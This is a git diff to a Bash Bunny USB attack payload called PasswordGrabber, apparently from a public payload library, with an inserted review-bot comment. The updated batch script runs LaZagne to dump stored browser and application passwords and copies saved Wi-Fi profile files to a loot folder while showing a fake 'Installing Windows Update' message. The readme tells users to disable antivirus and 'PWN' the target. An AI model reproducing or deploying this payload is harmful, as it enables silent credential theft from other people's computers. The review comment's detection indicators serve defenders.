diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd
index 5dbc35bd..27792067 100644
--- a/payloads/library/credentials/PasswordGrabber/e.cmd
+++ b/payloads/library/credentials/PasswordGrabber/e.cmd
@@ -1,34 +1,20 @@
 @echo off
 @echo Installing Windows Update
-REM Delete registry keys storing Run dialog history
-REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
-
-REM Creates directory compromised of computer name, date and time
-REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
-
-REM This executes LaZagne in the current directory and outputs the password file to Loot
-REM Time and Date is also added
 setlocal
 cd /d %~dp0
-%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
-REM These lines if you just want Passwords and no files.
-set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+REM Time and Date
+set drec=%COMPUTERNAME%_%date%_%TIME: =0%
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
 mkdir %dst% >>nul
-if Exist %USERPROFILE%\Documents (
-REM /C Continues copying even if errors occur.
-REM /Q Does not display file names while copying.
-REM /G Allows the copying of encrypted files to destination that does not support encryption.
-REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
-REM /E Copies directories and subdirectories, including empty ones.
+REM This executes LaZagne in the current directory and outputs the password file to Loot
+%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
-REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
-
-REM Same as above but does not create empty directories
-REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
+if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
+xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
 )
 REM Blink CAPSLOCK key
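Review bot: The added `xcopy` of `c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\*` is undocumented: the commit drops every REM line that explained the copy flags, and neither the remaining comments here nor the updated header in payload.txt say that saved WLAN profile files are now collected alongside the LaZagne output. For an authorized engagement that changes which data is in scope, so a comment such as `REM Also copies the saved WLAN profile files from Wlansvc\Profiles\Interfaces to %dst%` belongs above the `if Exist` line, with the same statement in the payload description. For defenders, the indicators visible in this hunk are `laZagne.exe all -v` started from the script's own directory on the attached USB storage and `xcopy` reading the Wlansvc profile directory, both of which suit process-creation and file-access alerting. The script continues past the hunk after `REM Blink CAPSLOCK key`.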
diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt index 4cc20386..797dab41 100644 --- a/payloads/library/credentials/PasswordGrabber/payload.txt +++ b/payloads/library/credentials/PasswordGrabber/payload.txt @@ -1,15 +1,15 @@ #!/bin/bash # -# Title: USB Exfiltrator -# Author: Hak5Darren -# Version: 1.1 -# Target: Windows XP SP3+ -# Props: Diggster, IMcPwn -# Category: Exfiltration +# Title: Password Grabber +# Author: Razerblade +# Version: 1.2 +# Target: Windows +# Props: Hak5Darren, TeCHemically, dragmus31 +# Category: Credentials # # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs -# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny. +# which in turn steals credentials by using LaZagne and saves them to /Loot # LED SETUP GET SWITCH_POSITION diff --git a/payloads/library/credentials/PasswordGrabber/readme.md b/payloads/library/credentials/PasswordGrabber/readme.md index b9f0efb8..18129740 100644 --- a/payloads/library/credentials/PasswordGrabber/readme.md +++ b/payloads/library/credentials/PasswordGrabber/readme.md 
@@ -1,25 +1,33 @@ # PasswordGrabber * Author: RazerBlade -* Creds: Hak5Darren, AlessandroZ -* Version: Version 1.1 -* Firmware support: 1.1 -* Target: Windows +* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31 +* Version: Version 1.2 +* Firmware support: 1.1+ +* Target: Windows 7+ ## Description Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. +This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. + Full read here: https://github.com/AlessandroZ/LaZagne +Downloads here: https://github.com/AlessandroZ/LaZagne/releases ## Configuration +1. You need to download the latest file from LaZagnes release page. +2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe +3. Plug it in a computer and PWN them. + +Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. + +## INFO By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. -I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy - -Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne -When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go! +## DISCLAIMER +Hak5 is not responsible for the execution of 3rd party binaries. ## STATUS | LED | Status | 
@@ -28,5 +36,5 @@ When compiled or downloaded, just drop it of to the PasswordGrabbers folder and | Green | Attack Complete | ## Discussion -[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ +[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/